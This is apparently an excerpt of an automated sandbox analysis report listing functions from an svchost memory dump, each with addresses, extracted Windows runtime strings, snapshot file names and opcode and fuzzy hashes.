                                                • Instruction Fuzzy Hash: ED61B736A0074ADFDB20EFA4C584BADB7B2BF48308F09406DD515EF680CB74AA41DB90
                                                Function 03C3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 03C3A309
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 03C3A2FB
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: 88ba39bd85ad4c893c8c90f18b7e4ab0a4a50ca6274d3c5e148ef4ed7bbb3257
                                                • Instruction ID: f6a0a4da448a6ff37b606432ae1ba803537d6f0524f44b2d67a2bb1cf0a2d55f
                                                • Opcode Fuzzy Hash: 88ba39bd85ad4c893c8c90f18b7e4ab0a4a50ca6274d3c5e148ef4ed7bbb3257
                                                • Instruction Fuzzy Hash: 4341CF78A04649DBDB11CF69C844B69B7F4FF86700F1944AAEC81DF2A1E735DA10CB41
                                                Function 03C6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local\$@
                                                • API String ID: 0-380025441
                                                • Opcode ID: ba27445a242533f57c143f14d9b0947ba92cae202c1045376780b528b7cc99f8
                                                • Instruction ID: d19451b5720a3534b69165f500853dc81849b9f0a5ebd4d7acffef7f66427152
                                                • Opcode Fuzzy Hash: ba27445a242533f57c143f14d9b0947ba92cae202c1045376780b528b7cc99f8
                                                • Instruction Fuzzy Hash: AD31B37A5083449FC310DF29C8C0A6BBBE8FBC5654F49092EF995C7260DA30DE05DB92
                                                Function 03C3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: f1c59133b1817cf9a0ab131decfb0dfea3b2faaa57a378348a6a973c3ed676e5
                                                • Instruction ID: be00aaf97956b56916b1b5b7d97fe4a1571b43b83d24ab134b2731902e9abb81
                                                • Opcode Fuzzy Hash: f1c59133b1817cf9a0ab131decfb0dfea3b2faaa57a378348a6a973c3ed676e5
                                                • Instruction Fuzzy Hash: EF824C75E002189BDB24CFA9C984BEDF7B5BF4A710F188169D85AEB250DB319E41CF50
                                                Function 03C37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8bca6361eead5c074511716da2787b4ceb36671cc67e447616df1921eac991a
                                                • Instruction ID: 2d51b14a2c476683a68a3beda7dba8961bd2f3038d6c2c80109ac449adceef35
                                                • Opcode Fuzzy Hash: c8bca6361eead5c074511716da2787b4ceb36671cc67e447616df1921eac991a
                                                • Instruction Fuzzy Hash: D9A16BB5608342CFD724DF29C480A2ABBE5BF89704F19496EE585DB350E730E945CF92
                                                Function 03C6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0db82049e943eed8f3afb27185a05683fe4bad9db05d5e5358d63aed22a0c05e
                                                • Instruction ID: 9e5445505445a6e9497ff835554e335669c171fff8a67fe58c9d5e37b1dc8e54
                                                • Opcode Fuzzy Hash: 0db82049e943eed8f3afb27185a05683fe4bad9db05d5e5358d63aed22a0c05e
                                                • Instruction Fuzzy Hash: 6D4149B5D00288AFDB20DFA9D880AADFBF4FB58300F14416EE859EB211D7319A01DF60
                                                Function 03C6A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: 4f3e426a6e092e9f6209aa5eb0ce3fc0d2c0af962f2ec626ba6c3c08e6782a70
                                                • Instruction ID: 89f174274dab451a1fc6c813c47b92bd799d84f0eb91e9922cf15142aeef4ff4
                                                • Opcode Fuzzy Hash: 4f3e426a6e092e9f6209aa5eb0ce3fc0d2c0af962f2ec626ba6c3c08e6782a70
                                                • Instruction Fuzzy Hash: 0C716D76E0071ADFDF28CF9DD5906ADBBB5BF48708F18816AE806EB240E7309951CB54
                                                Function 03C3973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                • Instruction ID: f49e858e14be0f8fd7364af565b33b151c54cc059969ad305024a28233406e22
                                                • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                • Instruction Fuzzy Hash: 90618D76D00219ABDF21DF99C844BEEFBB8FF81710F16456AE810EB290D7709A01DB91
                                                Function 03CBF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                • Instruction ID: a799be4487b597a356811bf0ba8f747b44f04ad4c5533c96b073fa64e1a2fe85
                                                • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                • Instruction Fuzzy Hash: 24516672A04345AFD721DE54CC44FAAB7B8FB84750F05092DFA80DB290DBB5EA14CB92
                                                Function 03CEB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PreferredUILanguages
                                                • API String ID: 0-1884656846
                                                • Opcode ID: 810c034543dd00fee494f1a6761da91e0b247cb54dec8a6bd59465c84adc0f75
                                                • Instruction ID: 4b28760c5f2d574f4213d36b3fc4bf5ebb85770cd9caf03d0f8c2a51e9bf6f07
                                                • Opcode Fuzzy Hash: 810c034543dd00fee494f1a6761da91e0b247cb54dec8a6bd59465c84adc0f75
                                                • Instruction Fuzzy Hash: 6A41C476D04219ABCF11DA95C841BFEF7B9EF44750F050166E911EF254DAB4DE40C7A0
                                                Function 03CAC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 430cc3a3e55188feac1b2f015b2d9fe2b94c824a6a38076275052869432745e2
                                                • Instruction ID: 78e54c4b5aba878866798ae7a5e83c245f2b725816f6fa7ea74367d5daf8b567
                                                • Opcode Fuzzy Hash: 430cc3a3e55188feac1b2f015b2d9fe2b94c824a6a38076275052869432745e2
                                                • Instruction Fuzzy Hash: 9B4165B6D0062DAADB21DB54CC84FDEB77CAB44718F0185E5EA08EB140DB709E889F94
                                                Function 03CB97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: verifier.dll
                                                • API String ID: 0-3265496382
                                                • Opcode ID: a9894b34153a67b0722c8a6172caefa9a7a06d24d795b1cb1d453bea08886d9f
                                                • Instruction ID: 1691e3386777735eecd9dd06246a70f5f48663393301029ff1bc56ce94eb5263
                                                • Opcode Fuzzy Hash: a9894b34153a67b0722c8a6172caefa9a7a06d24d795b1cb1d453bea08886d9f
                                                • Instruction Fuzzy Hash: 11319376A003119FDB24DF69A850B76B7F6EF5A314F598079E608DF391E7328E808790
                                                Function 03C636EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Flst
                                                • API String ID: 0-2374792617
                                                • Opcode ID: 2d1d877e8147a58199ad53010722fab38f55da189a6406a133c71cfc460cab22
                                                • Instruction ID: befa988da6598c5e9ce8788fe5bc9880c0530d25e80c7e810e4ab6897dead9ef
                                                • Opcode Fuzzy Hash: 2d1d877e8147a58199ad53010722fab38f55da189a6406a133c71cfc460cab22
                                                • Instruction Fuzzy Hash: B34198B56053019FC314CF19D2C0A16FBE4EF89714F18856EE44ACF291DB71DA42CB91
                                                Function 03C35096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx
                                                • API String ID: 0-89312691
                                                • Opcode ID: 8e461a6b7e4b441228d2f6761f3533095b7632f66fe3d05b79a50c21420d3f45
                                                • Instruction ID: 51aa2605a9077e87c9f14c27988b2a49acaa07c69dc42279b2c9ebeb88ca2e48
                                                • Opcode Fuzzy Hash: 8e461a6b7e4b441228d2f6761f3533095b7632f66fe3d05b79a50c21420d3f45
                                                • Instruction Fuzzy Hash: 4C1182307096528BEB24C91E88546B6F2D9EB97264F3C852AE462CF391D673DD418780
                                                Function 03CB106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrCreateEnclave
                                                • API String ID: 0-3262589265
                                                • Opcode ID: 5398c06d019a3f2df23f5f50ed1d8ea40cbff99cf8c36a5a127e35345d3f1474
                                                • Instruction ID: cde1fbade332cebcdc891ea9eefd23b4d3d46529e9c3ff0df21ebe9a14a10d1f
                                                • Opcode Fuzzy Hash: 5398c06d019a3f2df23f5f50ed1d8ea40cbff99cf8c36a5a127e35345d3f1474
                                                • Instruction Fuzzy Hash: D82107B59183449FC320DF1AD844A9BFBE8FBE5B00F144A1EB5A0DB250D7B1D504DB92
                                                Function 03C8739A Relevance: .7, Instructions: 705COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b840e4733519fadc3d9307634be246aea2f36b6c202992ccd72977f2bb4e50fe
                                                • Instruction ID: beb68af9dd1063871adc36d8ded1ce583a87e2c686d53affaa9ebc4275dd1edf
                                                • Opcode Fuzzy Hash: b840e4733519fadc3d9307634be246aea2f36b6c202992ccd72977f2bb4e50fe
                                                • Instruction Fuzzy Hash: 4A429175A006168FDB15EF59C4806BEF7B6FF88318B28856DD552EB340E734EA42CB90
                                                Function 03C5B2C0 Relevance: .6, Instructions: 629COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 373c7826561699dc3d5aca93c4d672f5c0483be2f5678bb18a9fe4d06248e608
                                                • Instruction ID: 77b09d09677fc85c6ab31df57f2df1c4936ad803d6b7002ea21d41b0b8aa1c2f
                                                • Opcode Fuzzy Hash: 373c7826561699dc3d5aca93c4d672f5c0483be2f5678bb18a9fe4d06248e608
                                                • Instruction Fuzzy Hash: D7329976E002199BCF24DFA8C884AAEBBB1FF54714F190029EC05EB381EB359D41CB94
                                                Function 03CC8158 Relevance: .6, Instructions: 617COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e517f0956ffd44887f40ed7793f9bd5fd07f9ad37621ad8fa5c3a882db9d706a
                                                • Instruction ID: 714e461ee81374bc0acaa7fb164c481b9a56445cad93ac4ac82ec070d8ef19c7
                                                • Opcode Fuzzy Hash: e517f0956ffd44887f40ed7793f9bd5fd07f9ad37621ad8fa5c3a882db9d706a
                                                • Instruction Fuzzy Hash: E7423975A103599FDB24CF69C881BAEF7B5BF88300F19819DE949EB241D734A981CF60
                                                Function 03CDA118 Relevance: .6, Instructions: 591COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 480222e85fa6bbf1c0fd7fba6e02e9a616ebf13f43d33f306fbd067993b0fb5c
                                                • Instruction ID: 64f2683dfbd8f484c7e36b3ae689a9b624088853f97251c668ef6c63b7a3c77c
                                                • Opcode Fuzzy Hash: 480222e85fa6bbf1c0fd7fba6e02e9a616ebf13f43d33f306fbd067993b0fb5c
                                                • Instruction Fuzzy Hash: E422AD78204651CFDB24CF2AC094772B7F1AF45300F18889AFA96CF685E735E692DB61
                                                Function 03CF16CC Relevance: .6, Instructions: 571COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: afcba136958c0d2f52006177652e323338911490b871630f98f5a3ccebbb11ae
                                                • Instruction ID: 0efa3fa15b15182e0a8be9f85d01267a049cd5cfb1fa2c26033f31bb78de6074
                                                • Opcode Fuzzy Hash: afcba136958c0d2f52006177652e323338911490b871630f98f5a3ccebbb11ae
                                                • Instruction Fuzzy Hash: A5228035A00216CFCB59CF59C490AAAF7B6FF88314B2D456DDA56DF344DB30AA41CB90
                                                Function 03C28397 Relevance: .4, Instructions: 380COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68632295a5e6b08fc4f35686167cbf91b5494f782c55964ed413408bc94fea54
                                                • Instruction ID: a9ceee2fd36f8d5c220c0074a4cc8a1b4b06f0ee7f88a381e489b7d4631cc9e9
                                                • Opcode Fuzzy Hash: 68632295a5e6b08fc4f35686167cbf91b5494f782c55964ed413408bc94fea54
                                                • Instruction Fuzzy Hash: 4CD1C475A007269BCF14EF65C890ABABBB5BF44708F094629F915DF280EB34EA45CB50
                                                Function 03C3D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3124092b18c1185750ccf5bbf40d3549ab01253326b6e7db0c49f220eadbd46
                                                • Instruction ID: 36cf4d49f2b9f0404de4cfe390480388e7d6d5a2803ddabd13e8a08a00aa0104
                                                • Opcode Fuzzy Hash: a3124092b18c1185750ccf5bbf40d3549ab01253326b6e7db0c49f220eadbd46
                                                • Instruction Fuzzy Hash: BBC1A571E002169BEF18CF5AC848BAEF7B5EF55314F198269D815EB280D771EA42CB81
                                                Function 03CB8243 Relevance: .3, Instructions: 322COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction ID: d334c1a31b82a34959d35abcfe95cdf579f016b65461ef4716b7bcd4152f0a78
                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction Fuzzy Hash: CFB13E78A00748AFDF24DF95C980AEBB7BDFF84304F144469A942EB790DA35EA45DB10
                                                Function 03C590DB Relevance: .3, Instructions: 287COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f92fbd45898c2da03748067d30bf3191a3e44c87833c750e9acb7d61e9cbd0a4
                                                • Instruction ID: 23f397a18733344356864ad61c056dc7f10c4437d0abb20fb2d6b52ec3e86710
                                                • Opcode Fuzzy Hash: f92fbd45898c2da03748067d30bf3191a3e44c87833c750e9acb7d61e9cbd0a4
                                                • Instruction Fuzzy Hash: 32A16A75900205AFEB12EFA4CC49FAE77B9AF45750F060094F901EF2A0D775AD50DBA4
                                                Function 03C383C0 Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4aba702a05b78d9ca217e2124169597e92c1977c8e2086359d66209299cb692
                                                • Instruction ID: 62cb4eb96a79b102cad59048c22df6155458c89986f8e7f3f7ade8214e11a4d3
                                                • Opcode Fuzzy Hash: d4aba702a05b78d9ca217e2124169597e92c1977c8e2086359d66209299cb692
                                                • Instruction Fuzzy Hash: 68C169741083418FEB64CF15C495BAAB7E4FF88704F49496EE989CB290D774EA08CF92
                                                Function 03C70185 Relevance: .3, Instructions: 276COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c968b0e4dd8eab9e6e16fce3eb331ef7f573e6de141b791e9f311a0e7e6852fd
                                                • Instruction ID: 3bf16fdc07a13450a0073aa4b36b2845eb358b136bba97ba829e7be4bddeb119
                                                • Opcode Fuzzy Hash: c968b0e4dd8eab9e6e16fce3eb331ef7f573e6de141b791e9f311a0e7e6852fd
                                                • Instruction Fuzzy Hash: A8A1C175A0072ADBDB24DF6AC991BAAB7F5FF44318F044129EE05DB281DB34E901DB50
                                                Function 03CB60E0 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43daf1486e112ea1653f4aa484bcc75e2c4297b6cb4f4da2e294b0fd9e39aaf8
                                                • Instruction ID: 24d1ab849e22ac93968fd24f81458c50e30096d4dfd797de98819199cfa9600c
                                                • Opcode Fuzzy Hash: 43daf1486e112ea1653f4aa484bcc75e2c4297b6cb4f4da2e294b0fd9e39aaf8
                                                • Instruction Fuzzy Hash: 0D91B071E00215AFDB15CFA8D884BEEFBB9AF48700F154169E951EB340D738EA509BA0
                                                Function 03C4E3F0 Relevance: .3, Instructions: 261COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40faecd83f0643dfe04d81da684b845ea0da2725f9d89854bf38603903f914d7
                                                • Instruction ID: ffce50bc57664964dd1f114cd67254298e06f74f0dee9c3d5f080b6400e3ded6
                                                • Opcode Fuzzy Hash: 40faecd83f0643dfe04d81da684b845ea0da2725f9d89854bf38603903f914d7
                                                • Instruction Fuzzy Hash: 1A910436A007258BEB24EB79D448B7EB7A5FF84714F0B40AAE805DF240EB34DA41C791
                                                Function 03C31131 Relevance: .3, Instructions: 259COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5ccda8bb4b9bdc01734c0f3ac518810ecf0a3f6867367ee81e77842bac9d5b9
                                                • Instruction ID: 3ca5ff5da37b684c5d074b7dfdd7ecc99c164f23ba3613204f6b28b82d1f8048
                                                • Opcode Fuzzy Hash: e5ccda8bb4b9bdc01734c0f3ac518810ecf0a3f6867367ee81e77842bac9d5b9
                                                • Instruction Fuzzy Hash: FEB10275A093408FD354DF28C580A5AFBF1BB89304F184A6EF899DB351D371EA45CB52
                                                Function 03C5D090 Relevance: .2, Instructions: 217COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                • Instruction ID: d54554adef98e06fa37319db79cb24be5979c5b12705ac50a177552ecd9bfd8b
                                                • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                • Instruction Fuzzy Hash: DF818176E002158BEF14CF68C8887AEF7B2FB94354F1A416BD816FB344D6329A40CB95
                                                Function 03C6E284 Relevance: .2, Instructions: 212COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0bc85a5d6b5c71eb57af0a1e3d5930a17f5fc452298a005f0e80274d198f4f74
                                                • Instruction ID: acdb49ab7eff64c3e105249ac2daf81580f3f6fd02ddeee266a5844d6a300250
                                                • Opcode Fuzzy Hash: 0bc85a5d6b5c71eb57af0a1e3d5930a17f5fc452298a005f0e80274d198f4f74
                                                • Instruction Fuzzy Hash: C1818E75A00709AFDB21CFA9C980AEEF7FAFB88344F14442AE455EB250D730AD45DB60
                                                Function 03C4C640 Relevance: .2, Instructions: 206COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 961af957aecc1f58b36449347d53a0a4596c3020dd933b1b6803ce10e0e60f88
                                                • Instruction ID: be6563652cba9969931ec7a8285d1b9dde2335a275badaf441bf53c949b5c4a9
                                                • Opcode Fuzzy Hash: 961af957aecc1f58b36449347d53a0a4596c3020dd933b1b6803ce10e0e60f88
                                                • Instruction Fuzzy Hash: 6071EDB6C01266AFDB25CF59C9907BEBBB4FF59700F15815AE842EB360D7709900CBA0
                                                Function 03C4260B Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9dce0243f801cfd8d3e546f4da066e12b5fd28e11cf2e2dd7f25a8d7cfd55d89
                                                • Instruction ID: 1b50a3005f9564603b728089805cb6684cfa7d90e0c62c581a923bb966174aa3
                                                • Opcode Fuzzy Hash: 9dce0243f801cfd8d3e546f4da066e12b5fd28e11cf2e2dd7f25a8d7cfd55d89
                                                • Instruction Fuzzy Hash: 2071EF356046419FD311DF29C485B6AB7E5FF88310F0A89AAF898CF351DB38D946CBA1
